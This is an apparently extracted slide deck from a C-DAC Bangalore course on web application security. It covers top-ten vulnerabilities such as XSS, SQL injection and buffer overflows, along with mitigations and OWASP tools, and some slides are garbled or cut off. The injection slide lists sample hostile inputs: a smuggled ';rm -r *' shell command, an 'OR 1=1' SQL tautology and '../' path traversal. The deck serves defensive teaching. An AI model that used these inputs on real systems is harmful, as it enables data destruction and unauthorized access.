web_app_sec

7/27/2019 web_app_sec

1/44

C-DAC, EC, Bangalore

Web Application

Security

Centre for Development of Advanced Computing (C-DAC)Electronics City, Bangalore.


2/44


Agenda Who are your Enemies

What is a web application

SD3 Security Framework

Top 10 vulnerabilities

How to avoid these

Demo Example


3/44


Know Your Enemy

If you know both the, enemy and

yourself, you will fight a hundred battles

without danger of defeat;

If you are ignorant of the enemy but

only know yourself, your chances of

winning and losing are equal;

If you know neither the enemy nor

yourself, you will certainly be defeated in

every battle.SUN TZU ON THE ART OF WAR

THE OLDEST MILITARY TREATISE IN THE WORLD

Chinese general, 500 B.C.


4/44


Who are the enemies?

Innocent (?) Users.. Can be u (!)..

Hackers..()


5/44


What is a web application?


6/44


Web application A web application or web service is a

software application that is accessible using a

web browser or HTTP(s) user agent.

A web application or webapp is an

application that is accessed via web browser

over a network such as the Internet or anintranet.

A computer software application that is


7/44


8/44


Web application securitySimply, Web Application Security

is...

Securing of web applications.

Security goes beyond establishing a firewalland implementing SSL.

Includes IDS, Policy, Standards, Awareness,Audit, Testing.

Do not assume someone else is taking care ofit.


9/44 C-DAC, EC, Bangalore

Is your application really

secure



Firewalls

Firewalls can provide:

Secure gateway to the Internet for internal

clients

Packet filtering

Auditing

Firewalls cannot provide:

Protection against application

level attacks over HTTP or HTTPS



Through the firewall

without afire suit



Concepts

Threat : Any natural or unintentional event

with the potential to cause harm to an

information system, resulting in a degradation

of a systems ability to fully perform its

mission.

Vulnerability: A security exposure in a system

software or application software component.



The SD3 Security Framework

SecureSecureby Designby Design

SecureSecureby Defaultby Default

Secure inSecure inDeploymentDeployment

Secure architecture and codeSecure architecture and code

Threat analysisThreat analysis

Vulnerability reductionVulnerability reduction

Attack surface area reducedAttack surface area reduced

Unused features turned off by defaultUnused features turned off by default

Minimum privileges usedMinimum privileges used

Protection: Detection, defense,Protection: Detection, defense,recovery, managementrecovery, management

Process: How to guides, architectureProcess: How to guides, architectureguidesguides

People: TrainingPeople: Training



Adopt the SD3 Security Framework

Build threat modelsBuild threat modelsConduct code reviews, penetration testsConduct code reviews, penetration tests

Run code with minimal privilegesRun code with minimal privileges

Minimize your attack surfaceMinimize your attack surface

Enable services securelyEnable services securely

Leverage the security best practicesLeverage the security best practices

Create security guidanceCreate security guidance

Build tools to assess application securityBuild tools to assess application security

SecureSecureby Designby Design

SecureSecureby Defaultby Default

Secure inSecure inDeploymentDeployment



Your code is part of your security

perimeter

Firewall

Hardened OS

Web Server

App Server

Firewall

Databases

LegacySystems

WebServices

Directories

H

umanResrcs

Billing

Custom Developed

Application CodeAPPLICATION

ATTACK

You cant use network layer protection (firewall, SSL, IDS, hardening)to stop or detect application layer attacks

NetworkLayer

Ap

plicationLayer

Your security perimeter has hugeholes at the application layer


16/44



Top 10 Vulnerabilities

Invalidated Parameters Broken Access Control

Broken Account and Session Management

Cross-site Scripting(XSS) Flaws Buffer Overflows

Command Injection Flaws

Error Handling Problems

Insecure Use of Cryptography

Remote Administration Flaws

Web and Application Server

Misconfiguration



95% of Web Apps Have Vulnerabilities

Cross-site scripting (80 percent)

SQL injection (62 percent)

Parameter tampering (60 percent)

Cookie poisoning (37 percent) Database server (33 percent)

Web server (23 percent)

Buffer overflow (19 percent)



1. Invalidated Parameters

Attacker can easily tamper any part of the HTTPrequest

before submitting.

- URL

- Cookies- Form fields

- Hidden fields

- Headers

Common names for common input tampering attacksforced browsing, command insertion, cross sitescripting, buffer overflows, format string attacks,SQL injection, cookie poisoning, and hidden fieldmanipulation.



Invalidated Parameters continued..

Do rigorous input data validation

- All parameters should be validated beforeuse

Do server-side validation

- Client side validation could be bypassed bythe attacker easily

- Client side validation is to be used mainly forquick user responsiveness



Invalidated Parameters

continued.. Use centralized code for input validation

- Scattered code is hard to maintain

Each parameter should be checked against astrict format that specifies exactly what inputwill be allowed.



2. Broken Access Control

Access control is how you keep one user awayfrom other users information

The problem is that many environments

provide authentication, but dont handle accesscontrol well

Many sites have a complex access controlpolicy

Key Points

Write down your access control policy

Dont use any ids that an attacker can



Broken Access Control continued..



3. Broken Account and Session Management Includes all aspects of handling user

authentication and managing active sessions. Session hi-jacking

If the session cookies are not properly

protected, an attacker can hijack an activesession and assume the identity of a user.

Account Management

Handling credentials across client-server

gap Backend authentication credentials too



Broken Account and

Session Management ...

Session Management HTTP is a stateless protocol. Web apps

need to keep track of which request camefrom which user

Brand sessions with an id using cookie,hidden field, URL tag, etc

Key Points

Keep credentials secret at all times

Use only the random sessionid provided byyour environment



4. Cross-site Scripting (XSS)An attacker can use cross site scripting

technique to implement malicious script (into aserver), which is then sent to unsuspecting usersaccessing the same server.

Example: Chat server

The attacked users (victim's) browser has no

way to know that the script should not betrusted, and will execute the script.

Because it thinks the script came from a trustedsource, the



4. Cross-site Scripting (XSS)

What it does ?

Disclose users session cookie session high-jacking

Disclose end user files

Redirect user to some other page or site Modify presentation of content

How to avoid ?

Search for all places where input from an HTTPrequest could possibly make its way into the HTMLoutput


28/44


XSS Scenario continued.. The server is a chat server

The chat server displays whatever messagethat is

typed in by a particular user to all otherusers.

An attacker (user A) implements JavaScript aspart

of a message (message A). The chat server saves the message (into the

database or whatever storage) without inputvalidation.

When unsus ectin user user B reads the


29/44


5 .Buffer Overflow Many system put limits on how much data a

variable can store or a system can handle.

Often times if these limits are exceeded, the

data will still be used, but bypass certainsecurity considerations.

Attackers use buffer overflows to corrupt theexecution stack of a web application.

By sending carefully crafted input to a webapplication, an attacker can cause the webapplication to execute arbitrary code.


30/44


Buffer Overflow continued.. Buffer overflow flaws can be present in both

the web server or application server productsor the web application itself.

URLs such as: http://www.myweb.com/cgi?param=filenam

e

Replaced with:

http://www.myweb.com/cgi?param=


31/44


6. SQL Injection When a web application passes information

from an HTTP request through as part of anexternal request, the attacker can inject special(meta) characters, malicious commands, orcommand modifiers into the information.

SQL injection is a particularly widespread anddangerous form of injection

- To exploit a SQL injection flaw, the attackermust find a

parameter that the web application passesthrough to a

database.


32/44


SQL Injection continued.. Path traversal

- ../ characters as part of a filename request

Additional commands could be tacked on to the end

of a parameter that is passed to a shell script toexecute an additional shell command

-; rm r *

SQL queries could be modified by adding additional

constraints to a where clause-OR 1=1


33/44


7 . Improper Error Handling

The most common problem is when detailedinternal error messages such as stack traces,database dumps, and error codes are displayed

to a potential hacker These messages reveal implementation details

that should never be revealed

Inconsistent errors may reveal internal info.

- File not found vs. Access denied


34/44


Improper Error Handling continued..

The errors must be handled according to a wellthought out scheme that will

- provide a meaningful error message to the

user- provide diagnostic information to the site

maintainers

- provide no useful information to anattacker

All security mechanisms should deny access

until specifically granted, not grant access


35/44


Improper Error Handling continued..

A specific policy for how to handle errorsshould be documented, including

- The types of errors to be handled

- For each, what information is going to bereported back to the user

What information is going to be logged

In the implementation, ensure that the site is

built togracefully handle all possible errors.

When errors occur, the site should respond with

a


36/44


8. Insecure Use of Cryptography

Use cryptography to store sensitive information

Algorithms are simple to use, integrating them ishard

Key Points

Do not even think about inventing a new algorithm

Be extremely careful storing keys, certs, and

passwords Rethink whether you need to store the information

Dont store user passwords use a hash like SHA-256


37/44


9. Remote Administration Flaws

Many sites allow remote administration

- Very powerful, often hidden interfaces

- Difficult to protect

Key Points- Eliminate all administration over the Internet

- Separate the admin application from the main app

- Limit the scope of remote administration

Consider strong authentication- Smart card or token


38/44


10. Web and Application Server

Misconfiguration All web and application servers have many security-

relevant configuration options

Default accounts and passwords

Unnecessary default, backup, sample apps,libraries

Overly informative error messages

Misconfigured SSL, default certificates, self-

signed certs Unused administrative services

Key Points:

Keep up with patches (Code Red, Slammer)

Use Scanning Tools (Nikto, Nessus)


39/44


Secure your application Training

Read the Top Ten paper!

Get developers trained in web application security

Try OWASP WebGoat to learn how flaws work

Policy

Write down the security rules for your application

Reviews

Get expert code review and penetration test

periodically

K t


40/44


Keys to secure your

application Customers Demand web applications that dont have these ten

simple problems

Developers

Take responsibility for securing your code

Software Development Organizations

Guarantee that your web applications dont havethe top ten flaws

Educators

Stop teaching insecure coding

Project Managers

Split your security budget between network and


41/44


Tools WebScarab - a web application vulnerability

assessment suite including proxy tools

Validation Filters (Stinger for J2EE, filtersfor PHP) generic security boundary filters thatdevelopers can use in their own applications

CodeSpy look for security issues usingreflection in J2EE apps


42/44


WebGoat - an interactive training and

benchmarking tool that users can learn about

web application security in a safe and legal

environment

WebSphinx web crawler looking for security

issues in web applications

OWASP - Java based portal code designed withsecurity as a prime concern


43/44


Case Study


44/44

Thank You !!

Documents

web_app_sec